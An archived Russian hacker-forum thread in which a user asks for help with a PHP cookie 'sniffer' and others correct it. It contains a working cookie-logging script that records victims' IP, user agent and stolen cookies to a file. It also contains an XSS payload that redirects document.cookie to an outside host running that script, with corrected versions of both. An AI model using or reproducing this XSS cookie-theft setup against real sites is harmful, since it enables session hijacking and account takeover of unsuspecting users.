PDA

Просмотр полной версии : Php снифер


Ru}{eeZ
10.05.2008, 00:21
Вот пишу PHP снифер, смотрите, что получилось:

<?php
$date = date("h:i:s A (d.m.Y)");
$inf = "Date: $date\nIP: $REMOTE_ADDR\nAgent: $HTTP_USER_AGENT\nCookie: $QUERY_STRING\n-----------------\n\n";
$fp = fopen("info.txt", "a");
fwrite($fp, $inf);
fclose($fp);
?>

Когда задаю в XSS что-то типа "<script>document.location="http://driska.name/snifer.php"+document.cookie</script>" нихрена не приходят отчёты

GreenBear
10.05.2008, 00:23
php.net/register_globals
location='http://xx';

astrologer
10.05.2008, 00:29
"http://example.com/qwe.php?" + ...

Ru}{eeZ
10.05.2008, 00:29
php.net/register_globals
location='http://xx';
Я просто описался в посте

Ru}{eeZ
10.05.2008, 00:30
А снифер то я правильно написал?

.:EnoT:.
10.05.2008, 00:31
Вы товарищ помоему читали старую книжку по php))

<?php
$date = date('h:i:s - d.m.Y');
$inf = "Date: $date\n IP: $_SERVER['REMOTE_ADDR']\n Agent: $_SERVER['HTTP_USER_AGENT']\n Cookie: $_SERVER['QUERY_STRING']\n-----------------\r\n";
$fp = fopen('info.txt', 'a+');
fwrite($fp, $inf);
fclose($fp);
?>

хотя бы так, но лучше использовать одинарные кавычки (кроме где \n)

GreenBear
10.05.2008, 00:31
А снифер то я правильно написал?
нет.

Ru}{eeZ
10.05.2008, 00:42
нет.

А поконкретнее? :mad:

GreenBear
10.05.2008, 00:46
http://ru2.php.net/manual/ru/reserved.variables.server.php
http://ru2.php.net/manual/ru/language.basic-syntax.php
php.net/register_globals

Ru}{eeZ
10.05.2008, 00:52
Исправил бы ошибки не умничая....

GreenBear
10.05.2008, 00:56
ну раз лень, так иди в пень.

.:EnoT:.
10.05.2008, 01:06
Ru}{eeZ
я выше запостил исправленный код.
Более того, здесь тебе никто ничем не обязан.

ну раз лень, так иди в пень.
рэп?

GreenBear
10.05.2008, 01:13
сила рифмованых строк :d